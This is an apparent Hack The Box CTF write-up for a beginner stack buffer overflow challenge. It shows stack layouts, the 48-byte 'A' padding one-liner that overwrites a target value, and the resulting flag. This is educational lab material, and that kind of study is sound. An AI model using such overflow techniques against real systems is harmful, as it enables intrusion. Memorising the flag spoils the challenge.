Getting Started
3 minutes to read
We are asked to exploit a basic Buffer Overflow vulnerability. We are given some indications and examples as well:
$ nc 178.62.11.21 31609
Stack frame layout
| . | <- Higher addresses
| . |
|_____________|
| | <- 64 bytes
| Return addr |
|_____________|
| | <- 56 bytes
| RBP |
|_____________|
| | <- 48 bytes
| target |
|_____________|
| | <- 40 bytes
| alignment |
|_____________|
| | <- 32 bytes
| Buffer[31] |
|_____________|
| . |
| . |
|_____________|
| |
| Buffer[0] |
|_____________| <- Lower addresses
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x0000000000000000 <- Start of buffer
0x00007ffe1d81dbd8 | 0x0000000000000000
0x00007ffe1d81dbe0 | 0x0000000000000000
0x00007ffe1d81dbe8 | 0x0000000000000000
0x00007ffe1d81dbf0 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x00000000deadbeef <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
After we insert 4 "A"s, (the hex representation of A is 0x41), the stack layout like this:
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x0000000041414141 <- Start of buffer
0x00007ffe1d81dbd8 | 0x0000000000000000
0x00007ffe1d81dbe0 | 0x0000000000000000
0x00007ffe1d81dbe8 | 0x0000000000000000
0x00007ffe1d81dbf0 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x00000000deadbeef <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
After we insert 4 "B"s, (the hex representation of B is 0x42), the stack layout looks like this:
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x4242424241414141 <- Start of buffer
0x00007ffe1d81dbd8 | 0x0000000000000000
0x00007ffe1d81dbe0 | 0x0000000000000000
0x00007ffe1d81dbe8 | 0x0000000000000000
0x00007ffe1d81dbf0 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x00000000deadbeef <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉
◉ ◉
◉ Fill the 32-byte buffer, overwrite the alginment address and the "target's" 0xdeadbeef value. ◉
◉ ◉
◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉
>>
Basically, they show how our input data is stored on the stack and they ask us to modify the values 0x6969696969696969
and 0x00000000deadbeef
that are present in the stack by exploiting a Buffer Overflow vulnerability. If we count the number of bytes needed, we will get 48
(6 * 8
). So, we will need to enter exactly 48
characters, for instance, A
letters:
$ python3 -c 'print("A" * 48)'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x4141414141414141 <- Start of buffer
0x00007ffe1d81dbd8 | 0x4141414141414141
0x00007ffe1d81dbe0 | 0x4141414141414141
0x00007ffe1d81dbe8 | 0x4141414141414141
0x00007ffe1d81dbf0 | 0x4141414141414141 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x4141414141414141 <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
HTB{b0f_tut0r14l5_4r3_g00d}
[-] You failed!